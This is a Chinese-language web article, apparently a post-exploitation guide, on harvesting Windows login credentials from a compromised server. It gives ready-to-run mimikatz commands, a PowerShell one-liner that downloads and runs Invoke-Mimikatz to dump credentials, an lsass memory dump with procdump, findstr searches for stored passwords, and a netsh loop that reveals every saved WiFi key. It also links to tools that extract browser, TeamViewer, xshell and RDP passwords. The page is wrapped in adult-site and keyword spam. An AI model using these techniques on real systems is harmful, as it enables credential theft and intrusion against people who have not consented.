成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Windows下登錄憑證竊取技巧

系統(tǒng) Windows
拿到一臺Windows服務器權限,收集各種登錄憑證以便擴大戰(zhàn)果。本篇分享幾個竊取Windows登錄憑證的工具和技巧。

拿到一臺Windows服務器權限,收集各種登錄憑證以便擴大戰(zhàn)果。本篇分享幾個竊取Windows登錄憑證的工具和技巧。

1、Windows 本地密碼Hash

Windows的系統(tǒng)密碼hash默認情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系統(tǒng)下hash密碼格式用戶名稱:RID:LM-HASH值:NT-HASH值。

例如: 

  1. Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040  
  2. 用戶名稱為:Administrator  
  3. RID為:500  
  4. LM-HASH值為:AF01DF70036EBACFAAD3B435B51404EE  
  5. NT-HASH值為:44F077E27F6FEF69E7BD834C7242B040 

破解方式一:hash在線破解網站 

  1. https://www.objectif-securite.ch/ophcrack  
  2. http://cmd5.com 

破解方式二:mimikatz

Github地址: 

  1. https://github.com/gentilkiwi/mimikatz 

mimikatz使用起來也非常簡單,提取Windows系統(tǒng)的明文密碼只需兩行命令: 

  1. privilege::debug  
  2. sekurlsa::logonpasswords 

破解方式三:wce 

  1. wce的常用參數(shù)使用說明如下:  
  2. 參數(shù)解釋:  
  3.     -l     列出登錄的會話和NTLM憑據(jù)(默認值)  
  4.     -s     修改當前登錄會話的NTLM憑據(jù) 參數(shù):<用戶名>:<域名>:<LM哈希>:<NT哈希>  
  5.     -w     通過摘要式認證緩存一個明文的密碼 

破解方式四:Powershell+mimikatz

直接利用poweshell來調用mimikatz抓取系統(tǒng)內的明文密碼。 

  1. powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 

破解方式五:prodump+mimikatz

procdump是微軟官方提供的一個小工具,微軟官方下載地址: 

  1. https://technet.microsoft.com/en-us/sysinternals/dd996900  
  1. # 將工具拷貝到目標機器上執(zhí)行如下命令(需要管理員權限,我選擇的版本是64位)  
  2. procdump.exe -accepteula -ma lsass.exe lsass.dmp  
  3. # 將生成的內存dump文件拷貝到mimikatz同目錄下,雙擊打開mimikatz執(zhí)行情況如圖:  
  4. mimikatz # sekurlsa::minidump lsass.dmp 
  5. # Switch to MINIDUMP  
  6. mimikatz # sekurlsa::logonPasswords full 

2、抓取瀏覽器密碼

很多瀏覽器都提供了記住密碼的功能,用戶在登錄一些網站的時候會選擇記住密碼。

LaZagne:提取瀏覽器所保存的密碼

github項目地址: 

  1. https://github.com/AlessandroZ/LaZagne 

3、服務端明文存儲密碼

在一些配置文件或日志里,明文記錄著敏感的密碼信息,如web.config、config.ini等文件,可通過手動翻查敏感目錄,也可以通過findstr命令來查找敏感文件和內容。 

  1. findstr /i /s "password" *.config  
  2. findstr /i /s "password" *.ini  
  3. findstr /i /s "password" *.xml 

4、第三方運維工具托管密碼解密

常見的有Linux運維工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,遠控軟件:Teamviewer等。

xshell 密碼解密工具: 

  1. https://github.com/dzxs/Xdecrypt 

提取WinSCP,PuTTY等保存的會話信息: 

  1. https://github.com/Arvanaghi/SessionGopher 

從內存中提取TeamViewer密碼的工具: 

  1. https://github.com/attackercan/teamviewer-dumper 

一鍵破解客戶端星號密碼--星號密碼查看器。

5、一鍵獲取電腦wifi密碼 

  1. #查看電腦連接過的所有wifi  
  2. netsh wlan show profiles  
  3. #查看wifi信號為Aaron的密碼  
  4. netsh wlan show profiles name="Aaron" key=clear  
  5. #CMD一鍵獲取 所有連接過的WIFI密碼  
  6. for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear 

6、Windows鍵盤記錄工具

可以記錄用戶鍵盤操作,從而捕獲用戶的敏感信息,在github和T00ls都可以找到這一類的源碼和工具。

7、Windows密碼提取工具合集

各種Windows程序的密碼提取工具,包括各種瀏覽器、郵箱、Windows網絡密碼、無線網絡密鑰等。

IE瀏覽器提取密碼工具: 

  1. https://www.nirsoft.net/toolsdownload/iepv.zip 

Firefox 瀏覽器密碼提取工具: 

  1. https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip 

Chrome 瀏覽器密碼提取工具: 

  1. https://www.nirsoft.net/toolsdownload/chromepass.zip 

SVN密碼解密器: 

  1. http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip 

郵箱密碼提取工具: 

  1. https://www.nirsoft.net/toolsdownload/mailpv.zip 

提取.rdp文件中存儲的密碼: 

  1. https://www.nirsoft.net/toolsdownload/rdpv.zip 

MSSQL憑據(jù)密碼獲取工具: 

  1. http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip  

 

責任編輯:龐桂玉 來源: 黑客技術與網絡安全
相關推薦

2020-10-12 06:32:25

Windows竊取技巧

2021-01-04 10:02:54

Facebook憑證攻擊

2021-01-18 10:43:19

惡意shellshell腳本網絡攻擊

2025-03-14 08:50:00

網絡安全網絡威脅AI

2022-01-03 07:21:21

Telegram網絡罪犯密錢包

2009-08-18 09:07:02

Windows 7身份憑證

2020-08-26 10:43:24

加密貨幣攻擊蠕蟲

2022-03-02 10:53:32

木馬惡意軟件

2022-07-02 15:23:59

卡巴斯基Exchange服務器

2025-03-19 06:00:00

2025-03-27 09:51:12

2021-01-25 11:18:35

谷歌用戶密碼釣魚網站

2020-12-29 18:45:26

Windows 10微軟bug

2021-02-07 20:53:18

后門程序惡意軟件Linux

2022-12-02 13:56:14

2021-12-31 10:49:02

惡意軟件黑客網絡攻擊

2021-12-01 11:25:15

MSHTML微軟漏洞

2024-12-16 15:54:08

2023-07-26 11:59:20

2024-05-11 19:27:56

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产成人免费在线 | 中文字幕国产精品 | 国产色 | 国产精品1区2区3区 国产在线观看一区 | 国产精品日韩欧美一区二区三区 | 久久一 | 国产精品久久久久久久白浊 | 国产精品欧美精品日韩精品 | 欧洲亚洲精品久久久久 | 日本又色又爽又黄的大片 | 日韩欧美亚洲 | 欧美亚洲国产一区二区三区 | 国产精品欧美一区二区 | 国产欧美日韩综合精品一区二区 | 国产精品99999 | 欧美成人一区二区三区片免费 | 久久久久亚洲 | 亚洲国产aⅴ成人精品无吗 亚洲精品久久久一区二区三区 | 久久免费精品 | 天天操天天干天天爽 | 蜜桃传媒一区二区 | 澳门永久av免费网站 | 精品视频一区二区 | 欧美a级成人淫片免费看 | 亚洲国产一区二区三区在线观看 | 日日夜夜影院 | 99热播放 | 午夜电影网站 | 亚洲成人一级片 | www.亚洲.com| 亚洲狠狠爱一区二区三区 | 91丨国产 | 亚洲一区二区三区在线播放 | 久久成人国产精品 | 美女久久| 日韩在线精品 | 97色综合 | 久久中文字幕av | 成人免费视频观看视频 | 成人免费大片黄在线播放 | 欧美精品v |